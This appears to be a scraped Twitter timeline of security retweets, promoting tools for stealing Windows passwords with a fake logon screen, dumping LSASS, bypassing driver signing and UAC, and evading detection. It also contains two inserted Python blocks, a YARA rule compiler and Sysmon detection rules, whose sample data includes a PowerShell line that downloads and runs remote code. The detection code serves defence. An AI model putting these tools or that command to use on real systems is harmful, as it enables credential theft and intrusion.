Tweets
\\??\\a.exe retweeted
FakeLogonScreen - A utility to fake the Windows logon screen in order to obtain the user's password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then saved to disk. https://github.com/bitsadmin/fakelogonscreen
\\??\\a.exe retweeted
Can your EDR detect symbolic link callback rootkits? Because ours sure as heck can't.
@aionescu and I wrote about these! https://windows-internals.com/dkom-now-with-symbolic-links/
\\??\\a.exe retweeted
1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Mach-O, RTF files, and powershell scripts. So far I have decision trees, random forests, and logistic regression (LR) working. https://github.com/inv-ds-research/yaraml_rules
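The retweet above describes compiling a trained model into a plain YARA rule. The following is an added illustration of that idea for the decision-tree case, not code from the yaraml_rules project: each split tests how many times a byte string occurs (YARA's `#s` count operator), and the tree is flattened into one boolean condition. The tree, feature strings, thresholds and sample inputs are constructed for this example; the toy evaluator only exists to check the emitted condition against the tree offline, and in practice you would load the rule with yara-python.

```python
"""Compile a decision tree into a standalone YARA rule and check it agrees
with the tree. Added illustration, not code from the yaraml_rules project:
features are byte strings whose (overlapping) occurrence count is the split
variable, matching YARA's `#s` count operator. The tree and samples below are
constructed for this example."""
import re
from dataclasses import dataclass
from typing import Dict, Tuple, Union


@dataclass
class Leaf:
    label: str  # class predicted at this leaf


@dataclass
class Node:
    feature: bytes  # byte string; the feature value is its occurrence count
    threshold: int  # count > threshold -> right subtree, else left subtree
    left: "Tree"
    right: "Tree"


Tree = Union[Leaf, Node]


def count_occurrences(data: bytes, needle: bytes) -> int:
    """Count overlapping occurrences, which is how YARA's #s counts matches."""
    n, start = 0, 0
    while (i := data.find(needle, start)) >= 0:
        n, start = n + 1, i + 1
    return n


def predict(tree: Tree, data: bytes) -> str:
    """Reference evaluation of the tree itself (what the YARA rule must reproduce)."""
    while isinstance(tree, Node):
        tree = tree.right if count_occurrences(data, tree.feature) > tree.threshold else tree.left
    return tree.label


def _features(tree: Tree, names: Dict[bytes, str]) -> Dict[bytes, str]:
    """Assign a YARA string identifier ($s0, $s1, ...) to every distinct feature."""
    if isinstance(tree, Node):
        names.setdefault(tree.feature, f"s{len(names)}")
        _features(tree.left, names)
        _features(tree.right, names)
    return names


def _condition(tree: Tree, names: Dict[bytes, str], positive: str) -> str:
    """Boolean YARA expression that holds exactly when the tree predicts `positive`."""
    if isinstance(tree, Leaf):
        return "true" if tree.label == positive else "false"
    test = f"#{names[tree.feature]} > {tree.threshold}"
    branches = []
    for guard, subtree in ((test, tree.right), (f"not ({test})", tree.left)):
        sub = _condition(subtree, names, positive)
        if sub == "false":  # no positive leaf below: drop the branch entirely
            continue
        branches.append(guard if sub == "true" else f"({guard} and ({sub}))")
    return " or ".join(branches) if branches else "false"


def compile_condition(tree: Tree, positive: str = "malicious") -> Tuple[str, Dict[str, bytes]]:
    """Return the YARA condition and the identifier -> bytes table it refers to."""
    names = _features(tree, {})
    return _condition(tree, names, positive), {n: f for f, n in names.items()}


def compile_rule(name: str, tree: Tree, positive: str = "malicious") -> str:
    """Emit a complete YARA rule; strings are hex strings so arbitrary bytes are allowed."""
    condition, strings = compile_condition(tree, positive)
    body = "\n".join(f"        ${n} = {{ {f.hex(' ')} }}" for n, f in strings.items())
    return f"rule {name}\n{{\n    strings:\n{body}\n    condition:\n        {condition}\n}}\n"


def evaluate_condition(condition: str, strings: Dict[str, bytes], data: bytes) -> bool:
    """Toy evaluator for the subset of YARA syntax this compiler emits (#s counts,
    and/or/not, parentheses, true/false). Only used to check the compiled rule
    against the tree offline; real scanning would go through yara-python."""
    expr = re.sub(r"#(s\d+)", lambda m: str(count_occurrences(data, strings[m.group(1)])), condition)
    expr = expr.replace("true", "True").replace("false", "False")
    return bool(eval(expr, {"__builtins__": {}}, {}))  # expr is our own generated text


# Constructed tree over PowerShell command-line fragments (illustration only).
TREE = Node(b"FromBase64String", 0,
            left=Node(b"IEX", 1, left=Leaf("benign"), right=Leaf("malicious")),
            right=Node(b"-w hidden", 0, left=Leaf("benign"), right=Leaf("malicious")))

# Constructed samples with the label the tree assigns to each.
SAMPLES = [
    (b"Get-ChildItem C:\\Users | IEX", "benign"),
    (b"powershell -w hidden -c [Convert]::FromBase64String('SQBFAFgA')", "malicious"),
    (b"IEX (New-Object Net.WebClient).DownloadString('http://x/a'); IEX $p", "malicious"),
]


def rule_agrees_with_tree(tree: Tree = TREE, samples=SAMPLES) -> bool:
    """True when the compiled condition and the tree give the same verdict on every sample."""
    condition, strings = compile_condition(tree)
    return all(predict(tree, data) == label
               and evaluate_condition(condition, strings, data) == (label == "malicious")
               for data, label in samples)


if __name__ == "__main__":
    print(compile_rule("ml_decision_tree", TREE))
    print("rule agrees with tree:", rule_agrees_with_tree())
```

Branches whose subtree contains no positive leaf are dropped during compilation, so the emitted condition only enumerates root-to-positive-leaf paths; a random forest would be the same construction repeated per tree with a vote threshold in the condition.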
\\??\\a.exe retweeted
We published our research "An Overhead View of the Royal Road" (English version)
#JSAC2020 #CPX360 https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html https://github.com/nao-sec/materials/blob/master/JSAC%2BCPRCon2020/An_Overhead_View_of_the_Royal_Road.pdf
\\??\\a.exe retweeted
KDU, Kernel Driver Utility - driver loader (and not only) bypassing Windows x64 Driver Signature Enforcement with support of various "functionality" providers - including Unwinder's RTCore, https://github.com/hfiref0x/KDU
\\??\\a.exe retweeted
RE just retired from @hackthebox_eu. As the creator of the box, I tried to bring phishing/macro obfuscation concepts to the initial access. The intended privescs were the WinRar ACE file exploit, and XXE in Ghidra. I'll show two unintended privescs too. https://0xdf.gitlab.io/2020/02/01/htb-re.html
\\??\\a.exe retweeted
#FakeLogonScreen is a C# utility to steal a user's password using a fake Windows logon screen. This password will then be validated and saved to disk. Useful in combination with #CobaltStrike's execute-assembly command. https://github.com/bitsadmin/fakelogonscreen
\\??\\a.exe retweeted
Load encrypted PE from XML Attribute. MSBuild is still the best.
https://github.com/XwingAngel/PELoader/
MSBuild sets Property then calls Execute.
Use this example to decouple payloads & prove that all security products have a "Single File Bias".
Decouple payloads to subvert detection.
\\??\\a.exe retweeted
in-memory traces of ppldump, exploiting zam64.sys vulndriver to dump lsass memory, cool stuff. sysmon will show a generic/noisy calltrace so detection chances here are low, if combined with lsass loading dbgcore.dll it may work. https://github.com/realoriginal/ppldump https://github.com/SouhailHammou/Exploits
\\??\\a.exe retweeted
Unwinding RTCore - response to recent Unwinder claims and behavior related to vulnerabilities found in his RTCore driver which is a part of MSI Afterburner, https://swapcontext.blogspot.com/2020/01/unwinding-rtcore.html
\\??\\a.exe retweeted
#Trickbot ITW is now using a brand new #UACBypass for Windows 10 machines: wsreset.exe uac bypass. #Emotet More info here: https://lolbas-project.github.io/lolbas/Binaries/Wsreset/ https://www.activecyber.us/activelabs/windows-uac-bypass
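Two of the retweets above name a host-side indicator without showing the check: the ppldump one suggests pairing the noisy call trace with lsass.exe loading dbgcore.dll, and the Trickbot one names the wsreset.exe UAC bypass, in which an auto-elevating Microsoft binary ends up launching the attacker's process. The following is an added example of both checks as Sysmon detection logic, not code from any of the linked projects. It assumes Sysmon events exported as one JSON object per line using Sysmon's own field names (EventID, Image, ImageLoaded, ParentImage, CommandLine); the log lines are constructed, and treating dbghelp.dll and any child of wsreset.exe as alert-worthy are this example's assumptions, not claims made in the tweets.

```python
"""Detection checks over Sysmon events for two behaviours from the retweets
above: lsass.exe loading the minidump library (dbgcore.dll) during an LSASS
dump, and wsreset.exe, an auto-elevating binary, spawning a child process in
the wsreset UAC bypass. Added example, not code from the linked projects.
Assumes Sysmon events exported as one JSON object per line with the native
field names; the sample log lines are constructed."""
import json
from typing import Callable, Dict, Iterable, List, Tuple

Event = Dict[str, object]


def _basename(path: object) -> str:
    """Lower-cased file name of a Windows path (Sysmon paths vary in case)."""
    return str(path).replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lsass_loads_dump_library(ev: Event) -> bool:
    """Sysmon Event ID 7 (ImageLoaded): lsass.exe loads dbgcore.dll.
    dbghelp.dll is added as an assumption of this example: it is the other
    library exporting MiniDumpWriteDump, so it is treated the same way."""
    return (ev.get("EventID") == 7
            and _basename(ev.get("Image", "")) == "lsass.exe"
            and _basename(ev.get("ImageLoaded", "")) in {"dbgcore.dll", "dbghelp.dll"})


def wsreset_spawns_child(ev: Event) -> bool:
    """Sysmon Event ID 1 (ProcessCreate) whose parent is wsreset.exe.
    Assumption: wsreset.exe has no legitimate reason to spawn processes, so
    any child is alert-worthy; tune with an allow-list if your fleet disagrees."""
    return ev.get("EventID") == 1 and _basename(ev.get("ParentImage", "")) == "wsreset.exe"


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("lsass_loaded_minidump_library", lsass_loads_dump_library),
    ("wsreset_child_process", wsreset_spawns_child),
]


def run_detections(lines: Iterable[str]) -> List[Tuple[str, Event]]:
    """Parse each JSON line and return (rule_name, event) for every rule that fires."""
    hits: List[Tuple[str, Event]] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the whole run
        hits.extend((name, ev) for name, rule in RULES if rule(ev))
    return hits


# Constructed sample export: two true positives, two benign look-alikes, one bad line.
SAMPLE_LOG = r"""
{"EventID": 7, "Image": "C:\\Windows\\System32\\lsass.exe", "ImageLoaded": "C:\\Windows\\System32\\cryptdll.dll"}
{"EventID": 7, "Image": "C:\\Windows\\System32\\lsass.exe", "ImageLoaded": "C:\\Windows\\System32\\dbgcore.dll"}
{"EventID": 7, "Image": "C:\\Tools\\procdump64.exe", "ImageLoaded": "C:\\Windows\\System32\\dbghelp.dll"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\WSReset.exe", "CommandLine": "cmd.exe /c whoami"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}
not json at all
"""


def detect_sample() -> List[str]:
    """Names of the rules that fire on the constructed sample, in log order."""
    return [name for name, _ in run_detections(SAMPLE_LOG.splitlines())]


if __name__ == "__main__":
    for name, ev in run_detections(SAMPLE_LOG.splitlines()):
        print(f"[{name}] {json.dumps(ev)}")
```

The lsass rule deliberately keys on the target process rather than the dumping tool, which is what makes it survive a renamed or unknown dumper; procdump64.exe loading dbghelp.dll in the sample is ignored for exactly that reason.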
\\??\\a.exe retweeted
Scripting with Cutter and Jupyter notebooks. https://medium.com/@duzvik/scripting-with-cutter-and-jupyter-notebooks-79d588e5fbb5
\\??\\a.exe retweeted
New Blog Post from @Haus3c on Azure. Ryan discusses Azure and Azure AD's components, reviews some of the attacks, and releases PowerZure to help understand the attacks. Link: https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a PowerZure: https://github.com/hausec/PowerZure
\\??\\a.exe retweeted
Tracking #aggah, after Roma225 and the RG Campaign... Our last analysis on this Threat Actor drops Lokibot
UAC Bypass: CMSTP
https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/
@securityaffairs @malwrhunterteam @zlab_team @yoroisecurity @VK_Intel @PaloAltoNtwks @JAMESWT_MHT
\\??\\a.exe retweeted
Some Lateral Movement Methods:
- Pass the Hash/Relay ((Net-)NTLM)
- Pass the Ticket (Silver/Golden)
- RDP (Legit creds)
- Remote Services (VNC/SSH)
- (D)COM (Remote sched tasks, Services, WMI)
- Remote Service Vuln (EB)
- Admin Shares (PSExec)
- Webshell (Chopper)
- WinRM (PS Remoting)
\\??\\a.exe retweeted
Adversary Tactics : PowerShell : https://github.com/specterops/at-ps/blob/master/Adversary%20Tactics%20-%20PowerShell.pdf (93.9 MB) Details : https://github.com/specterops/at-ps
\\??\\a.exe retweeted
Part one of "Unleashing the Power of #AppLocker: How to Get Started and Go Beyond the Basics" begins this Wednesday! Microsoft MVP @Oddvarmoe will cover application whitelisting during his presentation and live demo. https://hubs.ly/H0mBy0Q0
\\??\\a.exe retweeted
pwndrop - The new fast & fun way to set up an HTTP/WebDAV server for your payloads is coming! python -m SimpleHTTPServer may soon be retiring. Stay tuned! Here is a quick sneak peek:
\\??\\a.exe retweeted
Some study notes on LSASS hooking for harvesting interactive logon credentials. https://ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-by-hooking-msv1_0-spacceptcredentials Thanks to @_xpn_ for his inspiring posts about mimikatz.
\\??\\a.exe retweeted
#idatips Ever get a pointer to the middle of a struct? Just add the __shifted keyword to the variable's type definition!